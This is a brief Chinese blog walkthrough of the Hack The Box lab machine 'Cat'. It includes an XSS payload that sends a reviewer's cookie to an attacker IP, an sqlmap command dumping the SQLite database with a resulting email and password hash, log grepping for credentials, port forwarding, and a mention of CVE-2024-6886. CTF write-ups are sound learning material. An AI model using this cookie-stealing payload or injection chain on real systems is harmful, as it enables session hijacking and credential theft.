HTB-Cat
fscan
dirsearch扫到git泄露
githacker拉下来
注册账号后发现这里可能有漏洞点
审计代码 这里对出了照片的其他选项做了过滤,因此可以从照片入手
貌似是对MIME头做了检验
下面还有一个白名单
那好像不大好注了
看看别的
在view_cat看到打印了这么多内容
其中这几个在前面看到是被waf过滤过的
那么就可以从用户名入手
1 | <img src=1 onerror=this.src="http://10.10.16.35:4444/?yiyi="+encodeURIComponent(document.cookie)> |
注册登录后注册一只猫
得到审核人员的cookie
替换cookie进入管理员面板
继续审计accept_cat部分的代码,发现没有太多防护措施 且通过config可以看出是sqlite
尝试sqlmap注入一下
1 | python sqlmap.py -r C:\Users\31702\Desktop\tmp\req.txt --dbms=SQLite --tables --batch --level=5 |
得到
1 | rosamendoza485@gmail.com ac369922d560f17d6eeb8b2c7dec498c |
登录
这里跟着wp学到思路了
查看apache日志 拿到axel的密码
1 | cat /var/log/apache2/access.log | grep axel |
切换用户得到user.txt
开启了3000端口 将其穿出来
1 | gost -L=tcp://:3000/10.10.11.53:2222 |
也可以用ssh转发
1 | ssh rosa@cat.htb -L 3000:127.0.0.1:3000 |
后面把25端口也穿出来打CVE-2024-6886
即可
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Yiyi!
评论